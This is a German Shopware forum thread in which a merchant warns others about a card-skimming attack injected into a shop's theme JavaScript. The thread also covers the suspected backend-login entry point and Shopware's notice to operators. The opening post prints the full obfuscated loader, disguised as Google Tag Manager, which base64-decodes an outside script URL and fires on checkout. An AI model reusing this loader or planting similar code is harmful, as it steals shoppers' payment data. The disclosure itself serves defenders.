# Schadenscode / JS Integration

**URL:** <https://forum.shopware.com/t/schadenscode-js-integration/100395>\
**Category:** Shopware 5\
**Created:** [5. Juli 2023 um 14:39 UTC](https://forum.shopware.com/t/schadenscode-js-integration/100395 "2023-07-05T14:39:09Z")\
**Posts on this page:** 8\
**Page:** 1

<div class="post-metadata">

**Author:** ![ottscho](https://avatars.discourse-cdn.com/v4/letter/o/7ba0ec/32.png) [@ottscho](https://forum.shopware.com/u/ottscho)\
**Post date:** [5. Juli 2023 um 14:39 UTC](https://forum.shopware.com/t/schadenscode-js-integration/100395/1 "2023-07-05T14:39:09Z")

</div>

Hallo zusammen,  
bei einem unseren Kunden ist ein Schadenscode in der Theme Konfiguration / eigenes JS hinterlegt worden.  
Und zwar hat irgendjemand diesen JS Code hinterlegt:

```auto
<!-- Google Tag Manager -->
<script>
(function(n,x,b,z,i,y,m,o){z[‘GoogleAnalyticsObjects’]=o;y=i.createElement (x),n=i.getElementsByTagName(x)[0];if(b.href.match(new RegExp(atob(o)))){y.async=1;y.src=‘//’+z.atob(m);n.parentNode.insertBefore(y,n)}}) (‘fu’,‘script’,window.location,window,document,‘[//www.google-analytics.com/analytics.js','d2Vic3RhdGljcy5vcmcvdHJ1c3RiYWRnZS9ERS4xYmM1NTk0NjQ2NTk2ZjQwZmFhOC5jaHVuay5qcw==','Y2hlY2tvdXQ=](https://ottscho-it.slack.com//www.google-analytics.com/analytics.js','d2Vic3RhdGljcy5vcmcvdHJ1c3RiYWRnZS9ERS4xYmM1NTk0NjQ2NTk2ZjQwZmFhOC5jaHVuay5qcw==','Y2hlY2tvdXQ=)’);
</script>

```

Analysiert man dies, so wird folgendes Script geladen.  
[https://webstatics.org/trustbadge/DE.1bc5594646596f40faa8.chunk.js](https://webstatics.org/trustbadge/DE.1bc5594646596f40faa8.chunk.js)

Das Ganze hat zu Folge, dass ein Fake Paypal Checkout Button angezeigt wurde und Kreditkartendaten abgegriffen wurden. Wer auch immer das gemacht hat muss Ahnung von Shopware haben. Es war sehr auf Shopware zugeschnitten und die Platzierung erfordert auch Ahnung.

Ebenfalls der Dateiname vom eig. Script mit trustbadge…

Evtl. schaut ihr mal in euren Shops nach, ob ihr was ähnliches (ich hoffe nicht) habt.

@Moritz_Naczenski  
Evtl. könnt ihr einen Newsletter machen. Ich denke es ist ein wichtiges Thema.

Viele Grüße  
Benjamin

---

<div class="post-metadata">

**Author:** ![marco.steinhaeuser](https://dub1.discourse-cdn.com/flex013/user_avatar/forum.shopware.com/marco.steinhaeuser/32/14512_2.png) [@marco.steinhaeuser](https://forum.shopware.com/u/marco.steinhaeuser)\
**Post date:** [5. Juli 2023 um 14:52 UTC](https://forum.shopware.com/t/schadenscode-js-integration/100395/2 "2023-07-05T14:52:53Z")

</div>

Danke, Benny. Ich schau mal, was man da machen kann. Hast Du herausbekommen können, wie der Einstieg passierte? Bzw. was habt Ihr denn getan, um das einzudämmen? Hat Änderung von FTP-Zugangsdaten ausgereicht?

---

<div class="post-metadata">

**Author:** ![ottscho](https://avatars.discourse-cdn.com/v4/letter/o/7ba0ec/32.png) [@ottscho](https://forum.shopware.com/u/ottscho)\
**Post date:** [5. Juli 2023 um 17:20 UTC](https://forum.shopware.com/t/schadenscode-js-integration/100395/3 "2023-07-05T17:20:26Z")

</div>

Hi Marco,  
Backend Login und ne dann beim Theme Manager / Konfiguration eingetragen.

---

<div class="post-metadata">

**Author:** ![daniel.naumann](https://avatars.discourse-cdn.com/v4/letter/d/db5fbb/32.png) [@daniel.naumann](https://forum.shopware.com/u/daniel.naumann)\
**Post date:** [6. Juli 2023 um 08:57 UTC](https://forum.shopware.com/t/schadenscode-js-integration/100395/4 "2023-07-06T08:57:39Z")

</div>

Backend Login ist nur eine Vermutung. Und es wurde wie folgt eingetragen

 ![Bildschirmfoto 2023-07-06 um 10.17.40](https://europe1.discourse-cdn.com/flex013/uploads/shopware/original/3X/e/3/e35659a08c031c2a0a2d47ef1519c8c0dcf5a02a.png)

---

<div class="post-metadata">

**Author:** ![SForst](https://avatars.discourse-cdn.com/v4/letter/s/df705f/32.png) [@SForst](https://forum.shopware.com/u/SForst)\
**Post date:** [6. Juli 2023 um 09:14 UTC](https://forum.shopware.com/t/schadenscode-js-integration/100395/5 "2023-07-06T09:14:37Z")

</div>

@daniel.naumann : Ist das hier der gleiche Fall wie der vom Threadersteller oder ist das eine weitere Meldung ?

Grüße

---

<div class="post-metadata">

**Author:** ![Max\_Shop](https://avatars.discourse-cdn.com/v4/letter/m/58f4c7/32.png) [@Max\_Shop](https://forum.shopware.com/u/Max_Shop)\
**Post date:** [6. Juli 2023 um 09:17 UTC](https://forum.shopware.com/t/schadenscode-js-integration/100395/6 "2023-07-06T09:17:13Z")

</div>

Vermutlich unterschiedlich, da es einen eigenen Thread gibt: [Shopware spezifische Malware gefunden](https://forum.shopware.com/t/shopware-spezifische-malware-gefunden/100406)

---

<div class="post-metadata">

**Author:** ![daniel.naumann](https://avatars.discourse-cdn.com/v4/letter/d/db5fbb/32.png) [@daniel.naumann](https://forum.shopware.com/u/daniel.naumann)\
**Post date:** [6. Juli 2023 um 09:27 UTC](https://forum.shopware.com/t/schadenscode-js-integration/100395/7 "2023-07-06T09:27:41Z")

</div>

Der gleiche, fehlende interne Absprache wer den Thread schreibt 😃 aber lesen es ein paar doppelt als eine(r) zu wenig. 🙂

---

<div class="post-metadata">

**Author:** ![marco.steinhaeuser](https://dub1.discourse-cdn.com/flex013/user_avatar/forum.shopware.com/marco.steinhaeuser/32/14512_2.png) [@marco.steinhaeuser](https://forum.shopware.com/u/marco.steinhaeuser)\
**Post date:** [7. Juli 2023 um 12:47 UTC](https://forum.shopware.com/t/schadenscode-js-integration/100395/8 "2023-07-07T12:47:46Z")

</div>

Info an Shopbetreiber ist raus. Danke für den Hinweis!
